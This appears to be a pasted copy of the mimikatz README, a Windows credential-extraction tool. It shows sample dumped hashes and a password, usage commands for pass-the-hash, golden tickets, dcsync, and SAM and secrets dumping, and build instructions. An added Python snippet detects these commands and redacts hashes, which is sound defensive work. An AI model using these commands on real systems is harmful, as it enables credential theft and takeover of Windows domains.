a guest
Feb 7th, 2018
# mimikatz

**`mimikatz`** is a tool I've made to learn `C` and make some experiments with Windows security.

It's now well known for extracting plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.

```
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
```
But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of information in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, _yes_).

If you don't want to build it, binaries are available on https://github.com/gentilkiwi/mimikatz/releases

## Quick usage
```
log
privilege::debug
```

### sekurlsa
```
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
```

### kerberos
```
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
```

### crypto
```
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export
```

### vault & lsadump
```
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local
```
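
A defender's view of the commands listed above, as an added example that is not part of the mimikatz project: a Python check that flags these `module::command` strings in process-creation command lines and masks `/ntlm:` and `/krbtgt:` values before they reach an alert. The category labels and the sample command lines are constructed for illustration.

```python
import re

# module::command pairs from the Quick usage section, grouped by the activity
# a defender would report. The category labels are this example's own.
CATEGORIES = {
    "credential-dump": {"sekurlsa::logonpasswords", "lsadump::sam",
                        "lsadump::secrets", "lsadump::cache",
                        "vault::cred", "vault::list"},
    "ticket-theft": {"sekurlsa::tickets", "kerberos::list", "kerberos::ptt"},
    "pass-the-hash": {"sekurlsa::pth"},
    "golden-ticket": {"kerberos::golden"},
    "dcsync": {"lsadump::dcsync"},
    "key-export": {"crypto::certificates", "crypto::keys",
                   "crypto::capi", "crypto::cng"},
    "privilege": {"privilege::debug", "token::elevate", "token::revert"},
}
LOOKUP = {cmd: cat for cat, cmds in CATEGORIES.items() for cmd in cmds}

COMMAND_RE = re.compile(r"\b([a-z]+)::([a-z]+)\b", re.IGNORECASE)
SECRET_RE = re.compile(r"(/(?:ntlm|krbtgt):)[0-9a-f]{32}", re.IGNORECASE)


def redact(cmdline):
    """Mask hash arguments so the alert itself does not leak key material."""
    return SECRET_RE.sub(r"\1<redacted>", cmdline)


def scan(cmdline):
    """Return sorted (category, command) hits found in one command line."""
    hits = set()
    for module, command in COMMAND_RE.findall(cmdline):
        name = f"{module}::{command}".lower()
        if name in LOOKUP:
            hits.add((LOOKUP[name], name))
    return sorted(hits)


# Constructed sample process-creation command lines (not real telemetry).
SAMPLES = [
    r'C:\Temp\tool.exe "privilege::debug" "sekurlsa::logonpasswords"',
    r'x.exe "SEKURLSA::pth /user:Administrateur /domain:winxp '
    r'/ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd"',
    r'C:\Windows\System32\notepad.exe C:\notes\std::vector.txt',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(scan(line), redact(line))
```

Commands typed into the interactive console never appear in a process command line, so this check complements monitoring of access to LSASS memory rather than replacing it.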

## Build
`mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
* for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 & x64** - http://www.microsoft.com/download/details.aspx?id=44914)
* _for `mimikatz driver`, `mimilove` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_

`mimikatz` uses `SVN` for source control, but is now available with `GIT` too!
You can use any tools you want to sync, even the `GIT` integration built into Visual Studio 2013 =)

### Synchronize!
* GIT URL is : https://github.com/gentilkiwi/mimikatz.git
* SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk
* ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip

### Build the solution
* After opening the solution, `Build` / `Build Solution` (you can change architecture)
* `mimikatz` is now built and ready to be used! (`Win32` / `x64`)
* you may get error `MSB3073` about `_build_.cmd` and `mimidrv`; this is because the driver cannot be built without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK.

### ddk2003
With this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies)

For this optional platform, Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 afterwards.

Follow the instructions:
* http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
* _http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_

## Licence
CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

## Author
* Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
* DCSync function in `lsadump` module was co-written with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )

This is a **personal** development, please respect its philosophy and don't use it for bad things!